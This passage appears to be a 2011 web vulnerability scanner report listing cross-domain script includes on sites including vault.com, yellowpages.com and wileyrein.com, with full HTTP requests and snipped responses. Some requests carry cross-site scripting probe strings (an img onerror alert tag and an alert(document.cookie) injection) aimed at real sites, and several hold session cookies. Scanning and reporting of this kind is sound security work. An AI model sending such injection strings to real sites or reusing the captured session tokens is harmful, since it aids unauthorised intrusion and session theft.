16.113. http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:09 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI1djc6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3V76Uek5-Ukge5z0w0GW4zcMJG-AAzga6Pt55Oem6kfqR5njtNTLTD9EP9JFvyA3oio1O80l0FFREQAkitFr/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:13 GMT;path=/
Content-Length: 37405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date
...[SNIP]...
<body>    


   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...

16.114. http://www.vault.com/wps/portal/usa/rankings/individual  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wps/portal/usa/rankings/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000iBjnc7dCLUAc9Rch1_CgmMI:140i3s34m; Path=/
Keep-Alive: timeout=10, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:44 GMT;path=/
Content-Length: 103574


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
</script>

   <SCRIPT type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=null" >
   </SCRIPT>
...[SNIP]...
<!-- /utility -->


<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vaultaddthisuser"></script>
...[SNIP]...

16.115. http://www.weil.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=f5iszeqogtut2im5bsdgiyf3; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19338
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
</form>


<script type="text/javascript" src="http://cetrk.com/pages/scripts/0008/4473.js"> </script>
...[SNIP]...

16.116. http://www.wileyrein.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263656;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/
Set-Cookie: CFTOKEN=43582841;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

16.117. http://www.wileyrein.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.cfm HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

16.118. http://www.wileyrein.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /x22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /x22 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

16.119. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a HTTP/1.1
Host: www.yellowpages.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261271506.1295450814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=261271506.1001034229.1295450814.1295450814.1295450814.1; __utmc=261271506; __utmv=261271506.|1=trial_id=relevancyControl2=1,; __utmb=261271506.1.10.1295450814; s_cc=true; s_nr=1295450813968; gpv_p50=error_page; s_sq=%5B%5BB%5D%5D; track_link=%7B%22pageName%22%3A%22error_page%22%7D; s_vi=[CS]v1|269B81578514AD15-60000169A0247D25[CE]; search_terms=Attorneys; parity_analytics=---+%0A%3Avisit_id%3A+nfa4wzodvfw2y17mv7r0lysb8wmr3%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A15%3A48.284574+%2B00%3A00%0A; vrid=eb20d5b0-060c-012e-ac55-001b782eaaae; _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; b=10010

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:44:25 GMT
Status: 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "809c5a9492df77869b9e54c4d50166fc"
Cache-Control: no-cache
Set-Cookie: track_link=; domain=yellowpages.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: search_terms=a; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+xztnfiromsxitdd3azz2t0umflx3v%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+16%3A44%3A25.168962+%2B00%3A00%0A; path=/; expires=Sat, 19-Jan-2036 16:44:25 GMT
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; path=/; HttpOnly
X-Urid: d-4c087170-0619-012e-e1b8-00237da01a9e
Expires: Wed, 19 Jan 2011 16:44:24 GMT
Connection: keep-alive
Content-Length: 227262

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
<![endif]-->
<script src="http://i1.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>

<script src="http://i1.ypcdn.com/webyp/javascripts/jquery_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://i1.ypcdn.com/webyp/javascripts/tracking_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<body class="webkit chrome win"><script src="http://i1.ypcdn.com/webyp/javascripts/omniture_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<link href="http://i1.ypcdn.com/webyp/stylesheets/page/fancybox.css?12909" media="screen" rel="stylesheet" type="text/css" />
<script src="http://i1.ypcdn.com/webyp/javascripts/jquery/jquery.fancybox-1.3.1.js?12909" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i2.ypcdn.com/webyp/javascripts/base_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.120. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a HTTP/1.1
Host: www.yellowpages.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261271506.1295450814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=261271506.1001034229.1295450814.1295450814.1295450814.1; __utmc=261271506; __utmv=261271506.|1=trial_id=relevancyControl2=1,; __utmb=261271506.1.10.1295450814; s_cc=true; s_nr=1295450813968; gpv_p50=error_page; s_sq=%5B%5BB%5D%5D; track_link=%7B%22pageName%22%3A%22error_page%22%7D; s_vi=[CS]v1|269B81578514AD15-60000169A0247D25[CE]; search_terms=Attorneys; parity_analytics=---+%0A%3Avisit_id%3A+nfa4wzodvfw2y17mv7r0lysb8wmr3%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A15%3A48.284574+%2B00%3A00%0A; vrid=eb20d5b0-060c-012e-ac55-001b782eaaae; _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; b=10010

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:51 GMT
Status: 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "949e18924a8dcea5e9bdd6d06bf089a4"
Cache-Control: no-cache
Set-Cookie: track_link=; domain=yellowpages.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: search_terms=a; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+xcoq4zeuc44uriy2ui83ef05gr06h%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A26%3A51.502219+%2B00%3A00%0A; path=/; expires=Sat, 19-Jan-2036 15:26:51 GMT
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; path=/; HttpOnly
X-Urid: d-763b5ff0-060e-012e-f3e3-00237da31aba
Expires: Wed, 19 Jan 2011 15:26:50 GMT
Connection: keep-alive
Content-Length: 227262

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
<![endif]-->
<script src="http://i1.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>

<script src="http://i1.ypcdn.com/webyp/javascripts/jquery_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://i1.ypcdn.com/webyp/javascripts/tracking_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<body class="webkit chrome win"><script src="http://i1.ypcdn.com/webyp/javascripts/omniture_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<link href="http://i1.ypcdn.com/webyp/stylesheets/page/fancybox.css?12909" media="screen" rel="stylesheet" type="text/css" />
<script src="http://i2.ypcdn.com/webyp/javascripts/jquery/jquery.fancybox-1.3.1.js?12909" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i1.ypcdn.com/webyp/javascripts/base_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.121. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/a HTTP/1.1
Host: www.yellowpages.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261271506.1295450814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; s_vi=[CS]v1|269B81578514AD15-60000169A0247D25[CE]; s_cc=true; s_nr=1295450867551; gpv_p50=error_page; s_sq=%5B%5BB%5D%5D; __utma=261271506.1001034229.1295450814.1295450814.1295450814.1; __utmc=261271506; __utmv=261271506.|1=trial_id=destinySegmentB=1,; __utmb=261271506.3.10.1295450814; track_link=%7B%22pageName%22%3A%22error_page%22%7D; search_terms=Attorneys; parity_analytics=---+%0A%3Avisit_id%3A+nfa4wzodvfw2y17mv7r0lysb8wmr3%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A15%3A48.284574+%2B00%3A00%0A; vrid=eb20d5b0-060c-012e-ac55-001b782eaaae; _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; b=10010
If-None-Match: "949e18924a8dcea5e9bdd6d06bf089a4"

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:27:52 GMT
Status: 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "2edd618a42923de103ebf230f6bb2310"
Cache-Control: no-cache
Set-Cookie: track_link=; domain=yellowpages.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: search_terms=a; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+yc66hhnjxgb7f8cdbxjmz2k2ysnd6%0A%3Avisit_start_time%3A+2011-01-19+15%3A15%3A48.284572+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A27%3A52.564290+%2B00%3A00%0A; path=/; expires=Sat, 19-Jan-2036 15:27:52 GMT
Set-Cookie: _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlOTc0MjkxMmFkNzM3ODI1MTUzNTI4ZDEzYzczYzlkZjQ%3D--9c4ba5554adcb3c70acdbf419598e94fbcf23da5; path=/; HttpOnly
X-Urid: d-9a6f8f70-060e-012e-007c-001b782f050a
Expires: Wed, 19 Jan 2011 15:27:51 GMT
Connection: keep-alive
Content-Length: 227261

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
<![endif]-->
<script src="http://i2.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>

<script src="http://i1.ypcdn.com/webyp/javascripts/jquery_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://i1.ypcdn.com/webyp/javascripts/tracking_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<body class="webkit chrome win"><script src="http://i2.ypcdn.com/webyp/javascripts/omniture_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<link href="http://i2.ypcdn.com/webyp/stylesheets/page/fancybox.css?12909" media="screen" rel="stylesheet" type="text/css" />
<script src="http://i1.ypcdn.com/webyp/javascripts/jquery/jquery.fancybox-1.3.1.js?12909" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i1.ypcdn.com/webyp/javascripts/base_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script language="javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.122. http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/a HTTP/1.1
Host: www.yellowpages.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=261271506.1295450814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; s_vi=[CS]v1|269B81578514AD15-60000169A0247D25[CE]; __utma=261271506.1001034229.1295450814.1295450814.1295450814.1; __utmc=261271506; __utmv=261271506.|1=trial_id=destinySegmentB=1,; __utmb=261271506.3.10.1295450814; s_cc=true; s_nr=1295450886795; gpv_p50=unknown; s_sq=%5B%5BB%5D%5D; search_terms=Attorneys; parity_analytics=---+%0A%3Avisit_id%3A+7g31vcz6blbwuyst2ujgy2kkcnytt%0A%3Avisit_start_time%3A+2011-01-19+15%3A29%3A09.367042+%2B00%3A00%0A%3Alast_page_load%3A+2011-01-19+15%3A29%3A09.367044+%2B00%3A00%0A; vrid=c89c4c10-060e-012e-5fa1-001e0be9dcfa; _parity_session=BAh7BjoPc2Vzc2lvbl9pZCIlNDhjNWI5YjQxMWRkYmQwMDdhOGMzZGNjMjMyMzllOTY%3D--e85fdcd10e9f42d085a59e3158c0c6b82c914391; b=10011

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:29:16 GMT
Status: 404 Not Found
Server: nginx
Content-Type: text/html
Connection: keep-alive
Content-Length: 214516

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" name
...[SNIP]...
<![endif]-->
<script src="http://i2.ypcdn.com/webyp/javascripts/css_browser_selector.js?12909" type="text/javascript"></script>

<script src="http://i1.ypcdn.com/webyp/javascripts/jquery_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://i1.ypcdn.com/webyp/javascripts/tracking_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<body class="error_page"><script src="http://i2.ypcdn.com/webyp/javascripts/omniture_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...
<link href="http://i1.ypcdn.com/webyp/stylesheets/page/fancybox.css?12909" media="screen" rel="stylesheet" type="text/css" />
<script src="http://i2.ypcdn.com/webyp/javascripts/jquery/jquery.fancybox-1.3.1.js?12909" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i2.ypcdn.com/webyp/javascripts/base_packaged.js?12909" type="text/javascript"></script>
...[SNIP]...

17. Email addresses disclosed  previous  next
There are 93 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


17.1. http://dcregistry.com/computer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /computer.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /computer.html HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:31 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
